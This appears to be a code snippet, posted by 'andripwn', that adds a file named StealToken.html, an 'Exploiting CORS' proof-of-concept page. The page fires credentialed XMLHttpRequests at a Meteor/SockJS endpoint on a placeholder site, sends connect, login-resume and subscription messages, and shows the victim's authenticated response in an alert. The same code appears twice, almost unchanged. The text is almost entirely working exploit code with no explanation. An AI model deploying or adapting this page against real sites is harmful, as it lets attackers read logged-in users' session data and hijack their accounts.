andripwn · February 19, 2020 20:33
diff --git a/StealToken.html b/StealToken.html
 <!DOCTYPE html>
 <html>
 <head><title>Exploiting CORS</title></head>
 <body>
 <center>
 <h1>Getting your information through CORS</h1>
 <button type="button" onclick="ProcessUrls()">Exploit</button>
 </div>
 <script type="text/javascript">
 var cont = 0;
     var requests = new Array();     
     function ProcessUrls()
     {
         requests = new Array();
         var urls = new Array('http://privatewebsite.com/sockjs/203/jb93ne78/xhr','http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr', 'http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr');
 for(i=0;i<urls.length;i++)
         {
             requests.push(new ProcessUrl(urls[i]));  
         }
 }
 function ProcessUrl(url)
     {
            cont+=1;    
            if (cont == 2 ){
              var http = new XMLHttpRequest();
              http.open("POST", url, true);
              http.withCredentials = true;
              http.onreadystatechange = function() 
            {
                if (http.readyState == 4 && http.status == 204) 
                { 
                   http.responseText 
                }
            };
            http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
            http.send('["{\\"msg\\":\\"connect\\",\\"version\\":\\"1\\",\\"support\\":[\\"1\\",\\"pre2\\",\\"pre1\\"]}"]');
 }
 else if (cont == 4 ){
              var http = new XMLHttpRequest();
              http.open("POST", url, true);
              http.withCredentials = true;
              http.onreadystatechange = function() 
            {
                if (http.readyState == 4 && http.status == 204) 
                {
                   http.responseText  
                }
            };
            http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
            http.send('["{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"resume\\":\\"abcabcabcabcabcabcabcabcabcabcabcabcabcabca\\"}],\\"id\\":\\"1\\"}","{\\"msg\\":\\"sub\\",\\"id\\":\\"hihihihihihihihi\\",\\"name\\":\\"meteor.loginServiceConfiguration\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"yzyzyzyzyzyzyzyzy\\",\\"name\\":\\"meteor_autoupdate_clientVersions\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"efefefefefefefefe\\",\\"name\\":\\"hooks\\",\\"params\\":[]}"]');
 }
 else if (cont == 5) { 
                var http = new XMLHttpRequest();
                http.open("POST", url, true); 
                http.withCredentials = true;
                http.onreadystatechange = function() 
            {
                if (http.readyState == 4 && http.status == 200 || http.readyState == 4 && http.status == 204 ) 
                {  
                   alert(http.responseText)
                }
            };
 http.send();    
            }
 else { 
                var http = new XMLHttpRequest();
                http.open("POST", url, true); 
                http.withCredentials = true;
                http.onreadystatechange = function() 
            {
                if (http.readyState == 4 && http.status == 200 || http.readyState == 4 && http.status == 204 ) 
                {  
                   http.responseText
                }
            };
 http.send();    
            }                      
     }
 </script>
	<!DOCTYPE html>
	<html>
	<head><title>Exploiting CORS</title></head>
	<body>
	<center>
	<h1>Getting your information through CORS</h1>
	<button type="button" onclick="ProcessUrls()">Exploit</button>
	</div>
	<script type="text/javascript">
	var cont = 0;
	var requests = new Array();
	function ProcessUrls()
	{
	requests = new Array();
	var urls = new Array('http://privatewebsite.com/sockjs/203/jb93ne78/xhr','http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr', 'http://privatewebsite.com/sockjs/203/jb93ne78/xhr_send','http://privatewebsite.com/sockjs/203/jb93ne78/xhr');
	for(i=0;i<urls.length;i++)
	{
	requests.push(new ProcessUrl(urls[i]));
	}
	}
	function ProcessUrl(url)
	{
	cont+=1;
	if (cont == 2 ){
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 204)
	{
	http.responseText
	}
	};
	http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
	http.send('["{\\"msg\\":\\"connect\\",\\"version\\":\\"1\\",\\"support\\":[\\"1\\",\\"pre2\\",\\"pre1\\"]}"]');
	}
	else if (cont == 4 ){
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 204)
	{
	http.responseText
	}
	};
	http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
	http.send('["{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"resume\\":\\"abcabcabcabcabcabcabcabcabcabcabcabcabcabca\\"}],\\"id\\":\\"1\\"}","{\\"msg\\":\\"sub\\",\\"id\\":\\"hihihihihihihihi\\",\\"name\\":\\"meteor.loginServiceConfiguration\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"yzyzyzyzyzyzyzyzy\\",\\"name\\":\\"meteor_autoupdate_clientVersions\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"efefefefefefefefe\\",\\"name\\":\\"hooks\\",\\"params\\":[]}"]');
	}
	else if (cont == 5) {
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 200 \|\| http.readyState == 4 && http.status == 204 )
	{
	alert(http.responseText)
	}
	};
	http.send();
	}
	else {
	var http = new XMLHttpRequest();
	http.open("POST", url, true);
	http.withCredentials = true;
	http.onreadystatechange = function()
	{
	if (http.readyState == 4 && http.status == 200 \|\| http.readyState == 4 && http.status == 204 )
	{
	http.responseText
	}
	};
	http.send();
	}
	}
	</script>